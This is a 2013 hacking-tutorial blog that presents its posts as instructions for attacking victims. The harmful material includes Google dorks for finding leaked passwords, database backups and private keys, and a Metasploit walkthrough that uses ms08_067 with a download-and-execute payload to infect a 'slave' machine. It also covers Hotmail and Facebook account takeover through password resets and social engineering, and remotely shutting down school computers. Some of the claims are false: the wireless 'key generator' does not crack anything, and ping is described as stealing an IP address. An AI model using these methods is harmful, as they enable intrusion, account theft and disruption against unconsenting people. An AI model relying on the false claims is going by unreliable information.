Sunday, December 29, 2013

New Website

Hello Guyz I am Owner Of the Website....Today i am giving you a one new website of mine which is "Get Free Bitcoins" So click on Below's Website Link and explore my New Website and earn Bitcoins..It a genuine Currency Today 1 Bitcoin = 839.7 USD 

Click on Link

Friday, December 27, 2013

Using Google.com to Find Usernames + Passwords! ( Facebook - Easy )

Prerequisites: (This one is Easy!)

1. A modern webbrowser and a internet.
2. Time

Method 1: Facebook!

We will be using a google dork to find usernames and passwords of many accounts including Facebook!

The Dork: intext:charset_test= email= default_persistent=
Enter that into Google, and you will be presented with several sites that have username and passwords lists!


Method 2: WordPress!

This will look for WordPress backup files Which do contain the passwords, and all data for the site!
The Dork: filetype:sql inurl:wp-content/backup-*

Method 3: WWWBoard!

This will look for the user and passwords of WWWBoard users
The Dork: inurl:/wwwboard/passwd.txt

Method 4: FrontPage!

This will find all users and passwords, similar to above.
The Dork: ext:pwd inurl:(service | authors | administrators | users) "# -FrontPage-"

Method 5: Symfony!

This finds database information and logins
The Dork: inurl:config/databases.yml -trac -trunk -"Google Code" -source -repository

Method 6: TeamSpeak! (big one!!!!!)

This will search for the server.dbs file (a Sqlite database file With the SuperAdmin username and password!!!)
The Dork: server-dbs "intitle:index of"

Method 7: TeamSpeak2!!! (also big!)

This will find the log file which has the Super Admin user and pass in the Top 100 lines. Look for "superadmin account info:"
The Dork: "inurl:Teamspeak2_RC2/server.log"

Method 8: Get Admin pass!

Simple dork which looks for all types of admin info
The Dork: "admin account info" filetype:log

Method 9: Private keys! (not any more!) 

This will find any .pem files which contain private keys.
The Dork: filetype:pem pem intext:private

And the Ultimate one, the regular directory full of passwords....
Method 10: The Dir of Passwords! 
Simple one!
The Dork: intitle:"Index of..etc" passwd

Sunday, March 24, 2013

How to infect or hack a computer with only IP address


A lot of the time I see this question asked here & everywhere on the forums that:
"Is it possible to infect slave using his IP address?"

So, I am going to show you how to do it.

Requirements:


First of all you need target IP of your slave.

Then open Metasploit Console & type db_create.
[Usage: This will create or connect you to a(your) database.]

Once you do that type Nmap.
[Usage: This will load Nmap in Metasploit Console]

Next you need to type db_nmap -sT -sV <target IP>
[This will scan OS, Ports, and Services running on the slave's computer.]
Wait for 5 minutes to complete the scan.

Once done, Note down the OS, Ports, and Services running on the slave's computer.

Now it's time to exploit the slave's machine.
Exploit depends on the OS, Ports, and Services running on the slave's computer.
So, you're lucky if you get OS WIN XP or 2000 because it's easy to exploit them.
No matter whether they are protected by a firewall or not.

Now:

Windows 2000 (all versions SP1, SP2, SP3, SP4)
Windows XP (all versions SP1, SP2, SP3)

Type show exploits
[Usage: This will show all the exploits in its database.]

Next you need to type use windows/smb/ms08_067_netapi
[Usage: This will select the exploit windows/smb/ms08_067_netapi]

Now Type show targets
[Usage: This will show all targets by exploit]

Now Type set target 0
[Usage: This will set target to 0 specified]
Then type show payloads
[Usage: This will bring up all the payloads]
Next type set payload windows/download_exec
[Usage: This will set the payload as windows/download_exec]


Then Type show options
[Usage: This will show all options in the exploit & payload]

In window you will see many options, in which you need to
Fill only two options RHOST & URL.

Type set RHOST <xxx.xxx.xxx.xxx >
[Usage: This will set RHOST (slave's ip) to xxx.xxx.xxx.xxx]

[Usage: This will set the URL to your direct server link.]

Finally you need to type exploit
[Usage: This will launch the exploit & your slave will be infected.]

You can now control your slave with a RAT. (Remote administration tool.)
So, any versions of Win 2000-XP can be exploited easily.

You can use the command db_autopwn –p –t –e.

In most cases you get a shell.

Saturday, March 23, 2013

About Us

Hello My Dear Visitors..


I am Ranjan Bawa (Marshalls), This is my website for Hacking Tutorials, Here I post a lot of hacking tricks and hacking tools and hacking Techniques For you Visit daily for latest updates, get intouch with us...thxx..

Saturday, March 16, 2013

IP Addresses and how to steal them through website address

IP stands for Internet Protocols. An IP address is the address for servers
and a person's computer who is connected to the internet. Everyone on the
internet has an IP address, and once you find out what it is, you know
exactly where they are, and you can begin to hack them.


Internet Protocols Addresses are usually made up of random numbers
seperated by dots. Every IP address is unique, no one can have the same
one. This is why it is very important that you're careful when typing, you do
NOT want to accidentally hack the wrong person/network.

Obtaining a target's IP is address is the first step to prepare for an attack.
Explained below are methods of obtaining a victim's IP address.

Ping - the easiest way to steal an IP

Ping is a tool used to endlessly make requests to a server or another
person. It works with both IP address or domain names. Domain names
are the addresses that you type in to go to a website. Domain names are
easier to remember, which is why the internet was invented.

Step by Step :-

1. Goto Cmd.exe

2. Type "ping Address"

For example!

Code:
ping http://www.google.com

3. The IP will be shown as this :-



4. Done and you will get the IP.

How to Hack Facebook [Hotmail]

This tutorial will show you how to 'hack' Facebook accounts that are
associated with a Hotmail address. More precisely, these methods
are ways to 'revert' accounts by password reset or change.

There is no program that can hack Facebook. If you don't want
to reset the target password, your options are to learn or hire.

Password reset, or account revert, is done when an individual
needs to recover an account. You are solely responsible for
how or why you choose to revert accounts. To avoid linking to
external sites, only HF urls are clickable. Copy and paste others.



METHODS

1. Preparation
2. Revert Hotmail account
3. Revert Facebook account


1. Preparation

Go to


Copy and paste headers of your Facebook email notifications
from your Hotmail inbox, to retrieve contact list IP addresses.

Use Facebook search to identify Facebooks with Hotmail accounts
from your contacts. Copy and save Facebook profile information.


2. Revert Hotmail account

Use IP addresses and Facebook profile information prepared.

Method 2a - Password Reset by Mobile Site

Go to


Note the secret question and retrieve the answer using
social engineering approaches of Hackforums users.

You will be prompted to reset the password online.


Method 2b - Password Reset by Email

Go to
How to hack almost any Hotmail by N3w_2_H@Ck1n™

Submit to


You will receive an email with a password reset link, to recover the Hotmail account.


3. Revert Facebook account

If prompted with security checks from the main site,
use the Facebook profile information prepared.

To avoid security checks, go to http://m.facebook.com/

Click 'Forgot Password'. You will receive an email with
a password reset link, to recover the Facebook account.

Remote shutdown computers at school

hey guys, a fun thing to do when your sitting in school bored out of your mind is to fuck with people right? well i like to turn peoples computers off remotely without them know it was me, so lets get started

1) Open CMD, you can do this by clicking start menu, moving over to more programs > accessories and the Command Prompt/CMD if the school admin has blocked the use of CMD trying opening notepad typing 
@echo off
save that file as ****.Bat, the .Bat is the most important bit once done trying running that batch file and CMD may open if it's still blocked try Google some alternative ways to open it.

2) once CMD is open type "shutdown -i" and you should get a popup/wizard kinda thing 

3) select the computer you want to shutdown and choose the option you want to do whether it be shutdown/restart ect. then click ok/run/Shutdown whatever the bottom option is  and thats it! watch your friends and foes go crazy!

hope you enjoy, any thanks are appreciated!

Friday, March 15, 2013

How To crack wireless passwords with net tools 5


Get Into any Wireless Network with, Net tools 5.

Have Wireless signals in your area? but cant use them cuz they have security? This Tut will tell you how too use nettools 5 to get into them,

First you need too see what wireless networks are in your area,
this is pretty simply first, 

Open Control Panel...

[Image: 795c8a29576c338676e782d2faeeb322.png]

Then view network status and tasks,

[Image: 0b0d3abcbd394834bb9187400e69fa0a.png]

Then click on manage wireless networks,

[Image: a4b5d2808c38aca4f781c858e63c7fc3.png]

Once you find what kinda security it has, as high lighted below, open nettools

[Image: 4055c6c725ab8042e648efbe020cf48a.png]

NetTools Side of TuT,

[Image: 336d30f23dfffe69a46ff389ab914b1d.png]

Once you have nettools open, then, Start> Network Tools> WEP/WPA Key Generator, it should look like it is below,

[Image: d2dff113940c8e8722213a1bddaf96cc.png]

Once Open, select the type of security that the Wireless network your trying to get into has, then select "Hex (0-9,A-F)",

[Image: 3d75c2aefd12e6bdd6b75d04443b24d5.png]

Now you Need too select a Key Length, the best one too use is, 64/40 bits, once you have done that,Be sure to click on the Calculate Key Space,

[Image: 55f862bcc8fea91a613c4e3b1924cca5.png]

Now simply hit Generate Code, and your code will appear,

[Image: 84ccac40013391bd19c6ede7c5b6ebbc.png]

Now simply copy and paste that into the password bar, when prompt to, when your connecting too the Wireless signal,

[Image: d84da18c388ff6a1196956d32dd9e8cd.png]


Then press ok and you're connected to the internet.

[Image: a9644d8b76e868867753ff9645f10cba.png]

 

© 2013 Hacking Tutorials. All rights resevered. Designed by Ranjan Bawa

Back To Top